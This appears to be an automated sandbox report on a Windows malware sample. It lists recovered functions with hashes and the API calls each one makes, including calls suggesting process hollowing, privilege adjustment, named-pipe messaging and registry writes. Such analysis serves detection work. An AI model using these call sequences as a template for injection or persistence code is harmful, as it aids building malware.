  • HeapFree.KERNEL32(00000000,00000000,0000011A), ref: 001C3713
    • Part of subcall function 001DDB79: RtlAllocateHeap.NTDLL(00000000,00000800,001E53C8), ref: 001DDB9C
    • Part of subcall function 001DDB79: GetTickCount.KERNEL32(?,00000000,00000001,001E53C8,00000002,?,?), ref: 001DDBB2
    • Part of subcall function 001DDB79: QueryPerformanceFrequency.KERNEL32(?), ref: 001DDC07
    • Part of subcall function 001DDB79: QueryPerformanceCounter.KERNEL32(?), ref: 001DDC11
    • Part of subcall function 001DDB79: _aulldiv.NTDLL(?,?,?,?), ref: 001DDC23
    • Part of subcall function 001DDB79: RtlAllocateHeap.NTDLL(00000000,00000800), ref: 001DDCEB
    • Part of subcall function 001DDB79: GetTickCount.KERNEL32 ref: 001DDCFC
    • Part of subcall function 001DDB79: RtlEnterCriticalSection.NTDLL(001EB184), ref: 001DDD10
    • Part of subcall function 001DDB79: RtlLeaveCriticalSection.NTDLL(001EB184), ref: 001DDD2E
    • Part of subcall function 001DDB79: StrTrimA.SHLWAPI(00000000,001E53C8), ref: 001DDD60
    • Part of subcall function 001DDB79: lstrcpy.KERNEL32(?,001ED78A), ref: 001DDD85
    • Part of subcall function 001DDB79: HeapFree.KERNEL32(00000000,?,?), ref: 001DDE1F
    • Part of subcall function 001DDB79: HeapFree.KERNEL32(00000000,00000000,001ED2CA), ref: 001DDE2E
    • Part of subcall function 001DDB79: HeapFree.KERNEL32(00000000,?,00000000), ref: 001DDE3F
    • Part of subcall function 001DDB79: HeapFree.KERNEL32(00000000,001ED78A), ref: 001DDE50
    • Part of subcall function 001DDB79: HeapFree.KERNEL32(00000000,00000000), ref: 001DDE5F
  • HeapFree.KERNEL32(00000000,001E53C8,0000011B), ref: 001C3788
    • Part of subcall function 001DDB3A: memcpy.NTDLL(001CD4DC,001CD4DC,00000000,001CD4DC,001CD4DC,001CD4DC,00000000,?,?,001C4CB1,00000000,00000001,00000000,001EC1F9,001CD4DC,00000000), ref: 001DDB5D
    • Part of subcall function 001D9692: memset.NTDLL ref: 001D96C0
    • Part of subcall function 001D9692: StrTrimA.SHLWAPI(?,001E53C4), ref: 001D9721
    • Part of subcall function 001D9692: StrTrimA.SHLWAPI(00000001,001E53C4), ref: 001D9740
    • Part of subcall function 001D9692: _strupr.NTDLL ref: 001D9747
    • Part of subcall function 001D9692: StrTrimA.SHLWAPI(?,?), ref: 001D9754
    • Part of subcall function 001D9692: memcpy.NTDLL(00000000,00000000,-00000008,-00000020,00000000,-00000020), ref: 001D979C
    • Part of subcall function 001D9692: lstrlen.KERNEL32(?,00000000,?,?,?,00000000,?,00000000,?), ref: 001D97BB
  • RtlAllocateHeap.NTDLL(00000000,00000400,?), ref: 001C3800
  • wsprintfA.USER32 ref: 001C3815
  • lstrlen.KERNEL32(00000000,00000000), ref: 001C3820
  • HeapFree.KERNEL32(00000000,00000000,0000010D), ref: 001C383A
    • Part of subcall function 001C3CF4: RegCloseKey.ADVAPI32(00000057,?,?,001C27E9,001EC202,00000000,00000000,00000000,001EAC78,00000000,00000000,?,?,?,001C4A87,00000000), ref: 001C3D3F
  • RtlAllocateHeap.NTDLL(00000000,00000400,001EC206), ref: 001C38C8
  • wsprintfA.USER32 ref: 001C38DC
  • lstrlen.KERNEL32(00000000,00000000), ref: 001C38E7
  • HeapFree.KERNEL32(00000000,00000000,0000010D), ref: 001C3901
  • HeapFree.KERNEL32(00000000,?,001EC206), ref: 001C3923
  • RtlAllocateHeap.NTDLL(00000000,00000400,?), ref: 001C393E
  • wsprintfA.USER32 ref: 001C394E
  • lstrlen.KERNEL32(00000000,00000000), ref: 001C3959
    • Part of subcall function 001CBD48: lstrlen.KERNEL32(?,00000000,?,?,?,?,?,?,001CD153,00000125,?,00000004,00000000), ref: 001CBD78
    • Part of subcall function 001CBD48: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 001CBD8E
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,?,00000000,?,?,?,?,001CD153), ref: 001CBDC4
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,00000000,?), ref: 001CBDDF
    • Part of subcall function 001CBD48: CallNamedPipeA.KERNEL32(00000000,?,?,00000010,00000119,00000001), ref: 001CBDFD
    • Part of subcall function 001CBD48: GetLastError.KERNEL32 ref: 001CBE07
    • Part of subcall function 001CBD48: HeapFree.KERNEL32(00000000,00000000), ref: 001CBE2D
  • HeapFree.KERNEL32(00000000,00000000,0000010D), ref: 001C3973
    • Part of subcall function 001C3ACC: RtlAllocateHeap.NTDLL(00000000,00010000,00000000), ref: 001C3AE8
    • Part of subcall function 001C3ACC: lstrlen.KERNEL32(EMPTY,00000008,001EC4D7,00000000,0000010E,00000000,001C397E,?,?,001C397E), ref: 001C3B26
    • Part of subcall function 001C3ACC: HeapFree.KERNEL32(00000000,00000000,EMPTY), ref: 001C3B3D
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001D9BD6, Relevance: 26.5, APIs: 13, Strings: 2, Instructions: 208 Total matches: 54filememorytime
Similarity
  • Total matches: 54
  • API ID: FindNextFileHeapFree$CloseHandleCompareFileTimeCreateFileGetFileTimeStrChrStrRChrlstrcatmemcpymemset
  • String ID: [FILE]$}nls
  • API String ID: 2232422578-3867520224
  • Opcode ID: d63c3d0b7d30395697a42598c95896d20b1220c6287163fcac3fa7287f978ce5
  • Instruction ID: 72ed0b863297d3488007a14820031ed271860468cbdb941106eaa0929c179687
  • Opcode Fuzzy Hash: C821E123044BD393D22369821181BA65755FB419E3C0C73F3E9BCB538D4F02A6CA6B96
  • Instruction Fuzzy Hash: 72ed0b863297d3488007a14820031ed271860468cbdb941106eaa0929c179687
APIs
  • memset.NTDLL ref: 001D9C3D
  • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 001D9C6F
  • GetFileTime.KERNEL32(00000000,?,00000000,00000000), ref: 001D9C83
  • CloseHandle.KERNEL32(00000094), ref: 001D9C9A
  • StrRChrA.SHLWAPI(00001000,00000000,0000005C), ref: 001D9CA6
  • lstrcat.KERNEL32(00001000,001EDA23), ref: 001D9CE0
  • FindNextFileA.KERNEL32(00000000,?), ref: 001D9D28
  • StrChrA.SHLWAPI(?,0000002E), ref: 001D9D96
  • memcpy.NTDLL(001EB1D4,?,00000000), ref: 001D9DCF
  • FindNextFileA.KERNEL32(00000000,?), ref: 001D9DE4
  • CompareFileTime.KERNEL32(?,?), ref: 001D9E0D
  • HeapFree.KERNEL32(00000000,001EB1D4), ref: 001D9E43
  • HeapFree.KERNEL32(00000000,00001000), ref: 001D9E53
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C178D, Relevance: 18.1, APIs: 12, Instructions: 117 Total matches: 53registrythreadsleep
Similarity
  • Total matches: 53
  • API ID: CloseHandleRegCloseKey$CreateEventDeleteFileGetLastErrorRegOpenKeyResumeThreadSetEventSleepSuspendThread
  • String ID:
  • API String ID: 1489053536-0
  • Opcode ID: a04800037acdc991d0ac410cda6be3e7e30f85b4b2334a738cde70afcf2a0bc8
  • Instruction ID: 36a5ddbc87084e266d50b713a62e435bbad551641728e73816c0b0ac65f44fd9
  • Opcode Fuzzy Hash: BB0104704685824B81277464983A3BADA15FF802D5D4D6366FE68B40895F8333DA3F27
  • Instruction Fuzzy Hash: 36a5ddbc87084e266d50b713a62e435bbad551641728e73816c0b0ac65f44fd9
APIs
  • RegOpenKeyA.ADVAPI32(80000001,001EC2F4,?), ref: 001C17A8
  • CloseHandle.KERNEL32(001EAF58), ref: 001C1809
  • DeleteFileW.KERNEL32(00000000,?,?,?,?,00000000), ref: 001C1816
  • GetLastError.KERNEL32(?,?,?,00000000), ref: 001C1820
  • RegCloseKey.ADVAPI32(?,?,?,?,00000000), ref: 001C187D
  • RegCloseKey.ADVAPI32(?,?,?,00000000), ref: 001C189C
  • SuspendThread.KERNEL32(00000000), ref: 001C18AA
  • CreateEventA.KERNEL32(001EB0D8,00000001,00000000), ref: 001C18BE
  • SetEvent.KERNEL32(00000000), ref: 001C18CB
  • CloseHandle.KERNEL32(00000000), ref: 001C18D2
  • Sleep.KERNEL32(000001F4), ref: 001C18E5
  • ResumeThread.KERNEL32(00000000), ref: 001C1909
    • Part of subcall function 001D9A9C: RegCloseKey.ADVAPI32(?,00000000), ref: 001D9B23
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C1A08, Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 122 Total matches: 58memorythreadstring
Similarity
  • Total matches: 58
  • API ID: HeapFree$GetCurrentThreadGetCurrentThreadIdRtlAllocateHeapRtlImageNtHeaderlstrlenwsprintf
  • String ID: W
  • API String ID: 3968678070-655174618
  • Opcode ID: 65c7814ccee3740933dfcccc29e4eab5d936ac043747db4873335771aa46cfd7
  • Instruction ID: 5d65c5167d05eb071b61c740fb2aa7fd16767ced16d889d5a98f858644bbd093
  • Opcode Fuzzy Hash: 8901B138088895A7C06790614063FBFD6017F822D0C4DF712F9693819E2F4372D35B57
  • Instruction Fuzzy Hash: 5d65c5167d05eb071b61c740fb2aa7fd16767ced16d889d5a98f858644bbd093
APIs
  • RtlImageNtHeader.NTDLL ref: 001C1A48
  • GetCurrentThreadId.KERNEL32 ref: 001C1A5E
  • GetCurrentThread.KERNEL32 ref: 001C1A6F
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBE6D
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,00000018,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBEBC
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,001DC9CF,00000800,?,?,00000000), ref: 001DBF2C
    • Part of subcall function 001DBD3F: NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 001DBF67
    • Part of subcall function 001DBD3F: RtlNtStatusToDosError.NTDLL(00000000), ref: 001DBF6E
    • Part of subcall function 001DBD3F: CloseHandle.KERNEL32(00000000), ref: 001DBF7D
    • Part of subcall function 001DBD3F: memset.NTDLL ref: 001DBF91
    • Part of subcall function 001D7471: GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74A9
    • Part of subcall function 001D7471: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74B5
    • Part of subcall function 001D7471: GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 001D74C3
    • Part of subcall function 001D7471: lstrcpy.KERNEL32(00000000), ref: 001D74DE
    • Part of subcall function 001C1966: lstrlen.KERNEL32(?,00000001,?,?,?,00000001,?,?), ref: 001C19D1
    • Part of subcall function 001C1966: HeapFree.KERNEL32(00000000,00000000), ref: 001C19F9
  • HeapFree.KERNEL32(00000000,?,00000000), ref: 001C1AE3
  • HeapFree.KERNEL32(00000000,00000020,00000000), ref: 001C1AF3
  • RtlAllocateHeap.NTDLL(00000000,00000400), ref: 001C1B3F
  • wsprintfA.USER32 ref: 001C1B50
  • lstrlen.KERNEL32(00000000,00000000), ref: 001C1B5B
    • Part of subcall function 001CBD48: lstrlen.KERNEL32(?,00000000,?,?,?,?,?,?,001CD153,00000125,?,00000004,00000000), ref: 001CBD78
    • Part of subcall function 001CBD48: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 001CBD8E
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,?,00000000,?,?,?,?,001CD153), ref: 001CBDC4
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,00000000,?), ref: 001CBDDF
    • Part of subcall function 001CBD48: CallNamedPipeA.KERNEL32(00000000,?,?,00000010,00000119,00000001), ref: 001CBDFD
    • Part of subcall function 001CBD48: GetLastError.KERNEL32 ref: 001CBE07
    • Part of subcall function 001CBD48: HeapFree.KERNEL32(00000000,00000000), ref: 001CBE2D
  • HeapFree.KERNEL32(00000000,00000000,0000010D), ref: 001C1B75
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 01B32CD0, Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 108 Total matches: 183string
Similarity
  • Total matches: 183
  • API ID: lstrcpy$CoInitializeExCoUninitializePathFindExtensionShellExecuteExlstrlenmemsetwsprintf
  • String ID: <
  • API String ID: 1457465641-4251816714
  • Opcode ID: 36c43c169b7f4adfcc7eed8db55d242cf47c4c2cff2d35238d5400cc3024a577
  • Instruction ID: 3de0f454e75166d7dc89cb568257ea8f04ae800c90f99e8cafab956dcc2645f6
  • Opcode Fuzzy Hash: 93F078708B2E8BC1CD9158C9160535692C06F30E68E9C9B137824F966B6B20312C9F9D
  • Instruction Fuzzy Hash: 3de0f454e75166d7dc89cb568257ea8f04ae800c90f99e8cafab956dcc2645f6
APIs
  • memset.NTDLL ref: 01B32CEE
  • CoInitializeEx.OLE32(00000000,00000002), ref: 01B32CF9
  • PathFindExtensionW.SHLWAPI(00000000), ref: 01B32D14
  • lstrcpyW.KERNEL32(00000000,01B38224), ref: 01B32D29
  • lstrlen.KERNEL32(01B37494,?,?,?,?,?,?,?,?,?,?,01B318D7,?), ref: 01B32D46
  • lstrcpyW.KERNEL32(00000000,01B384B8), ref: 01B32D77
    • Part of subcall function 01B3115C: RtlAllocateHeap.NTDLL(00000000,?,01B33CA0), ref: 01B31168
  • wsprintfW.USER32 ref: 01B32DAE
  • ShellExecuteExW.SHELL32(0000003C), ref: 01B32DE3
  • CoUninitialize.OLE32 ref: 01B32DF7
    • Part of subcall function 01B31171: HeapFree.KERNEL32(00000000,?,01B33D05), ref: 01B3117D
Strings
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Function 001C1586, Relevance: 16.6, APIs: 11, Instructions: 78 Total matches: 43memoryfile
Similarity
  • Total matches: 43
  • API ID: GetLastError$CloseHandleCreateFileGetModuleHandleGetWindowsDirectoryHeapFreeRtlAllocateHeapStrChrWriteFilewsprintf
  • String ID:
  • API String ID: 2627060994-0
  • Opcode ID: db8d6b5184187aba615ed9859a1217546e47d51c2a19850b1dde47917d77b9bd
  • Instruction ID: df8b16018d32c17adcafddecac367e62ad292682b52cd612f4b16c26ee5ce5b9
  • Opcode Fuzzy Hash: 00E05538564C02C3C4279AA888803BEDA41B3801C1E8E0212FA002A5BAAB0323C88F63
  • Instruction Fuzzy Hash: df8b16018d32c17adcafddecac367e62ad292682b52cd612f4b16c26ee5ce5b9
APIs
  • RtlAllocateHeap.NTDLL(00000000,00000104,00000000), ref: 001C159D
  • GetWindowsDirectoryA.KERNEL32(00000000,00000104,?,00000000,?,001C2CDE,00000094,00000000), ref: 001C15AF
  • StrChrA.SHLWAPI(00000000,0000003A), ref: 001C15BC
  • wsprintfA.USER32 ref: 001C15D0
  • CreateFileA.KERNEL32(00000002,C0000000,00000003,00000000,00000003,00000000,00000000), ref: 001C15E6
  • GetModuleHandleA.KERNEL32(00000000,00010000,?,00000000), ref: 001C15FF
  • WriteFile.KERNEL32(00000000,00000000), ref: 001C1607
  • GetLastError.KERNEL32 ref: 001C1615
  • CloseHandle.KERNEL32(00000000), ref: 001C161E
    • Part of subcall function 001C154D: RtlAdjustPrivilege.NTDLL(00000013,00000001,00000000,?), ref: 001C155B
    • Part of subcall function 001C154D: GetLastError.KERNEL32(?,001C2CD4), ref: 001C1572
  • GetLastError.KERNEL32(?,00000000,?,001C2CDE,00000094,00000000), ref: 001C162F
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C163F
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C20A7, Relevance: 15.2, APIs: 10, Instructions: 171 Total matches: 60memorystringthread
Similarity
  • Total matches: 60
  • API ID: HeapFree$lstrlenmemcpy$RtlAllocateHeapSwitchToThreadlstrcpy
  • String ID:
  • API String ID: 732536130-0
  • Opcode ID: a427ae31280889244c8d76e620d9b5f9788be67866348582a82e8a58517c2dc5
  • Instruction ID: a2cec6491fe12f34e3abab1a275dd9d209e051195fd81796f6ed6d95fe43367f
  • Opcode Fuzzy Hash: 90116D11582D32C3D113B46AC1E8B7EFA45FF961D6C1F3001E9127510E4A935EF6AB6E
  • Instruction Fuzzy Hash: a2cec6491fe12f34e3abab1a275dd9d209e051195fd81796f6ed6d95fe43367f
APIs
    • Part of subcall function 001C3B4A: HeapFree.KERNEL32(00000000,?,?), ref: 001C3BCD
  • lstrlen.KERNEL32(?,?,?,00000001), ref: 001C216D
  • RtlAllocateHeap.NTDLL(00000000,?,?), ref: 001C218F
  • lstrcpy.KERNEL32(00000020,?), ref: 001C21AE
  • lstrlen.KERNEL32(?), ref: 001C21B8
  • memcpy.NTDLL(?,?,?), ref: 001C21F9
  • memcpy.NTDLL(?,?,?), ref: 001C220C
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C224F
    • Part of subcall function 001CBD48: lstrlen.KERNEL32(?,00000000,?,?,?,?,?,?,001CD153,00000125,?,00000004,00000000), ref: 001CBD78
    • Part of subcall function 001CBD48: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 001CBD8E
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,?,00000000,?,?,?,?,001CD153), ref: 001CBDC4
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,00000000,?), ref: 001CBDDF
    • Part of subcall function 001CBD48: CallNamedPipeA.KERNEL32(00000000,?,?,00000010,00000119,00000001), ref: 001CBDFD
    • Part of subcall function 001CBD48: GetLastError.KERNEL32 ref: 001CBE07
    • Part of subcall function 001CBD48: HeapFree.KERNEL32(00000000,00000000), ref: 001CBE2D
  • SwitchToThread.KERNEL32(?,00000000,?,?), ref: 001C2230
    • Part of subcall function 001C2B66: memset.NTDLL ref: 001C2BCA
    • Part of subcall function 001C2B66: CloseHandle.KERNEL32(?), ref: 001C2C13
    • Part of subcall function 001C2B66: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C2DC7
    • Part of subcall function 001C2B66: GetLastError.KERNEL32(?,00000000,?), ref: 001C3013
  • HeapFree.KERNEL32(00000000,?,?), ref: 001C2275
  • HeapFree.KERNEL32(00000000,?,?), ref: 001C2291
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001DB838, Relevance: 15.1, APIs: 10, Instructions: 64 Total matches: 62sleepsynchronization
Similarity
  • Total matches: 62
  • API ID: CloseHandle$LocalFreeRtlDeleteCriticalSectionRtlEnterCriticalSectionRtlLeaveCriticalSectionSetEventSleepWaitForSingleObject
  • String ID:
  • API String ID: 1546928802-0
  • Opcode ID: 44cbb82d1bc8bc2d29e416fe044868003d437d2d6ba21b65bae40637e45a7bca
  • Instruction ID: 191c3ac2f4053567846d1cc33e924360c7a86817a4ea2a5247009256dd1e7f80
  • Opcode Fuzzy Hash: 18E02BA421196647D99708B00461B1FAE82BBE23E484C3303F552A25C2BB0712C4DF2A
  • Instruction Fuzzy Hash: 191c3ac2f4053567846d1cc33e924360c7a86817a4ea2a5247009256dd1e7f80
APIs
  • SetEvent.KERNEL32(?,001C1F1A,?,001EB068,?,00000000,001C13EB), ref: 001DB84C
    • Part of subcall function 001DAF5A: InterlockedExchange.KERNEL32(001C13EB,000000FF), ref: 001DAF61
  • WaitForSingleObject.KERNEL32(?,000000FF), ref: 001DB866
  • CloseHandle.KERNEL32(?), ref: 001DB86F
  • CloseHandle.KERNEL32(?), ref: 001DB87D
  • RtlEnterCriticalSection.NTDLL(00000008), ref: 001DB889
  • RtlLeaveCriticalSection.NTDLL(00000008), ref: 001DB8B2
  • Sleep.KERNEL32(000001F4), ref: 001DB8C1
  • CloseHandle.KERNEL32(?), ref: 001DB8CE
  • LocalFree.KERNEL32(?), ref: 001DB8DC
  • RtlDeleteCriticalSection.NTDLL(00000008), ref: 001DB8E6
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001DAFC4, Relevance: 13.8, APIs: 9, Instructions: 278 Total matches: 59memorythread
Similarity
  • Total matches: 59
  • API ID: GetLastError$VirtualAlloc$RtlEnterCriticalSectionRtlLeaveCriticalSectionSwitchToThread
  • String ID:
  • API String ID: 2452875170-0
  • Opcode ID: f7250d7c747c6724e85bc87f4a1d164c9bcb3d791413c0bfd27e5859a3665385
  • Instruction ID: e9cda0ef1bba535e69377ecfbf93933b7da227d9232d932a7ffe86fd6aa33c96
  • Opcode Fuzzy Hash: F931CCA2419FC2A7D5936A400890BBAC5C3FB12FF6D6CA732B674A02C81FC5274D2F54
  • Instruction Fuzzy Hash: e9cda0ef1bba535e69377ecfbf93933b7da227d9232d932a7ffe86fd6aa33c96
APIs
  • VirtualAlloc.KERNEL32(00000000,00008000,00003000,00000004), ref: 001DB03B
  • VirtualAlloc.KERNEL32(00000000,00008000,00003000,00000004), ref: 001DB05A
  • GetLastError.KERNEL32 ref: 001DB20B
  • GetLastError.KERNEL32 ref: 001DB28D
  • SwitchToThread.KERNEL32(?,?,?,?), ref: 001DB2D2
    • Part of subcall function 001DAF5A: InterlockedExchange.KERNEL32(001C13EB,000000FF), ref: 001DAF61
  • GetLastError.KERNEL32 ref: 001DB308
  • GetLastError.KERNEL32 ref: 001DB317
  • RtlEnterCriticalSection.NTDLL(?), ref: 001DB327
  • RtlLeaveCriticalSection.NTDLL(?), ref: 001DB338
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CAC3A, Relevance: 13.6, APIs: 9, Instructions: 124 Total matches: 61memorystring
Similarity
  • Total matches: 61
  • API ID: memcpy$RtlAllocateHeapmemset$HeapFreelstrcmpi
  • String ID:
  • API String ID: 2612869081-0
  • Opcode ID: c2dacee3140373e500c22aac8ec47d9c8ec65dfe813f0c9f26dc5badd2c4d201
  • Instruction ID: 2a6ed72f7be82828a989acab500aa79ad59f26800ec0c1f59594e6530e87086a
  • Opcode Fuzzy Hash: 4201C028044DC281C42710841061FF9A506EFD13B5C8CAB76DDA13F08B5D0273F53797
  • Instruction Fuzzy Hash: 2a6ed72f7be82828a989acab500aa79ad59f26800ec0c1f59594e6530e87086a
APIs
    • Part of subcall function 001C57CC: RtlEnterCriticalSection.NTDLL(001EB248), ref: 001C57D4
    • Part of subcall function 001C57CC: RtlLeaveCriticalSection.NTDLL(001EB248), ref: 001C57E9
    • Part of subcall function 001C57CC: InterlockedIncrement.KERNEL32(0000001C), ref: 001C5802
  • RtlAllocateHeap.NTDLL(00000000,00000018,001ED278), ref: 001CAC70
  • memset.NTDLL ref: 001CAC81
  • lstrcmpi.KERNEL32(?,?), ref: 001CACC1
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001CACEA
  • memcpy.NTDLL(00000000,?,?), ref: 001CACFE
  • memset.NTDLL ref: 001CAD0B
  • memcpy.NTDLL(?,?,?,?,00000000,?,00000000,?,?), ref: 001CAD24
  • memcpy.NTDLL(-00000005,001EC42B,00000007,?,?,?,?,00000000,?,00000000,?,?), ref: 001CAD3F
  • HeapFree.KERNEL32(00000000,?), ref: 001CAD5C
    • Part of subcall function 001C7AF2: RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 001C7B06
    • Part of subcall function 001C7AF2: memcpy.NTDLL(00000000,001C7C21,?,?,00000008,?,001C7C21,00000000,00000000,?), ref: 001C7B2F
    • Part of subcall function 001C7AF2: RegCloseKey.ADVAPI32(?,?,001C7C21,00000000,00000000,?,?,?,?,?,?,?,?,00000008,001C77AB,00000000), ref: 001C7B81
    • Part of subcall function 001C5761: InterlockedDecrement.KERNEL32(0000001C), ref: 001C5765
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CB593, Relevance: 13.6, APIs: 9, Instructions: 115 Total matches: 61memorystring
Similarity
  • Total matches: 61
  • API ID: RtlAllocateHeaplstrlen$HeapFree_wcsuprlstrcatlstrcpymemcpy
  • String ID:
  • API String ID: 1573093752-0
  • Opcode ID: f08ef74051028bad1df3046b05b27150d2409501bab8048f9561d94f45d3640f
  • Instruction ID: 49f792a003b958594b94fef63a2c1694da6c43edfde979eb277695decca324f2
  • Opcode Fuzzy Hash: F9F0FEB01D1901DB8023453EE06037DE502AC442E2B1C8617FD80B525F7F4372E0BF59
  • Instruction Fuzzy Hash: 49f792a003b958594b94fef63a2c1694da6c43edfde979eb277695decca324f2
APIs
  • lstrlenW.KERNEL32(00000000), ref: 001CB606
  • RtlAllocateHeap.NTDLL(00000000,001EAC82), ref: 001CB61C
  • memcpy.NTDLL(00000000,00000000,001EAC80), ref: 001CB62F
  • _wcsupr.NTDLL ref: 001CB63A
  • lstrlenW.KERNEL32(?,001EAC80), ref: 001CB66C
  • RtlAllocateHeap.NTDLL(00000000,?,001EAC80), ref: 001CB681
  • lstrcpyW.KERNEL32(00000000,?), ref: 001CB697
  • lstrcatW.KERNEL32(00000000,001EC940), ref: 001CB6B5
  • HeapFree.KERNEL32(00000000,00000000), ref: 001CB6C4
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C4CEB, Relevance: 13.6, APIs: 9, Instructions: 94 Total matches: 33filememorystring
Similarity
  • Total matches: 33
  • API ID: lstrlen$CloseHandleDeleteFileHeapFreeMapViewOfFileRtlAllocateHeapUnmapViewOfFilewcstombs
  • String ID:
  • API String ID: 3071814901-0
  • Opcode ID: d05e3ff4273796c9b17326ba3024fd4693d54f1ec967c9ade7a5abc202e65e4f
  • Instruction ID: 7e783e8648c44d89f659e24c24dcd4eaacf23487424efcd1c96aaf08dceaf5d1
  • Opcode Fuzzy Hash: 8DF08B71654AC2CBD22778A6A6517BBF901FB532C3C4E3732DC40251681F4232D22B1B
  • Instruction Fuzzy Hash: 7e783e8648c44d89f659e24c24dcd4eaacf23487424efcd1c96aaf08dceaf5d1
APIs
    • Part of subcall function 001C7262: memset.NTDLL ref: 001C7284
    • Part of subcall function 001C7262: lstrlenW.KERNEL32(?,?,?,?,?,?), ref: 001C72C8
    • Part of subcall function 001C7262: OpenFileMappingA.KERNEL32(80000000,00000000,?), ref: 001C730E
    • Part of subcall function 001C7262: CloseHandle.KERNEL32(?), ref: 001C7331
  • MapViewOfFile.KERNEL32(?,00000004,00000000,00000000,?,?,?,?), ref: 001C4D32
  • CloseHandle.KERNEL32(?), ref: 001C4D3E
  • lstrlenW.KERNEL32(00000000), ref: 001C4D58
  • RtlAllocateHeap.NTDLL(00000000,00000001), ref: 001C4D69
  • wcstombs.NTDLL ref: 001C4D7A
  • lstrlen.KERNEL32(?), ref: 001C4D87
    • Part of subcall function 001D9462: lstrlen.KERNEL32(-00000002,00000000,?,-00000002,-00000002,?,001C4D99), ref: 001D9472
    • Part of subcall function 001DDE6F: RtlAllocateHeap.NTDLL ref: 001DDEA1
    • Part of subcall function 001DDE6F: lstrcat.KERNEL32(00000000,001EC117), ref: 001DDF4F
    • Part of subcall function 001DDE6F: RtlAllocateHeap.NTDLL(00000000,00000800), ref: 001DDFC7
    • Part of subcall function 001DDE6F: StrTrimA.SHLWAPI(00000000,001E53C8), ref: 001DE039
    • Part of subcall function 001DDE6F: lstrcpy.KERNEL32(00000000,00000000), ref: 001DE061
    • Part of subcall function 001DDE6F: lstrcat.KERNEL32(00000000,?), ref: 001DE06F
    • Part of subcall function 001DDE6F: lstrcat.KERNEL32(00000000,00000000), ref: 001DE07F
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,?,?), ref: 001DE12C
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,?,001EB1C0), ref: 001DE176
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,00000000,001ED2CA), ref: 001DE185
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,?,?), ref: 001DE197
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,00000000), ref: 001DE1AD
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,?), ref: 001DE1BC
  • UnmapViewOfFile.KERNEL32(?,?,?,?,00000000,00000001), ref: 001C4DBC
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C4DCE
  • DeleteFileW.KERNEL32(?), ref: 001C4DDC
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C164D, Relevance: 13.6, APIs: 9, Instructions: 89 Total matches: 49memoryregistrystring
Similarity
  • Total matches: 49
  • API ID: GetTickCountHeapFreeRegCloseKeyRegCreateKeyRtlAllocateHeapRtlImageNtHeaderStrRChrlstrlenwsprintf
  • String ID:
  • API String ID: 473458267-0
  • Opcode ID: 21cd21af9a4aaeb0892998a3b8bf2ca0770d14e129f35d2f1317603fddf0a3d6
  • Instruction ID: 233c1588e08a29c017db756c2c3cc83d8e7a4f483530507245655a67d20bfa99
  • Opcode Fuzzy Hash: 82F05935850C435DC06788E5483AB3BE6417B002D8DDC6A33F9416D2066F8332969B6B
  • Instruction Fuzzy Hash: 233c1588e08a29c017db756c2c3cc83d8e7a4f483530507245655a67d20bfa99
APIs
  • RtlImageNtHeader.NTDLL(?), ref: 001C165E
  • RtlAllocateHeap.NTDLL(00000000,00000011), ref: 001C1685
  • GetTickCount.KERNEL32 ref: 001C169C
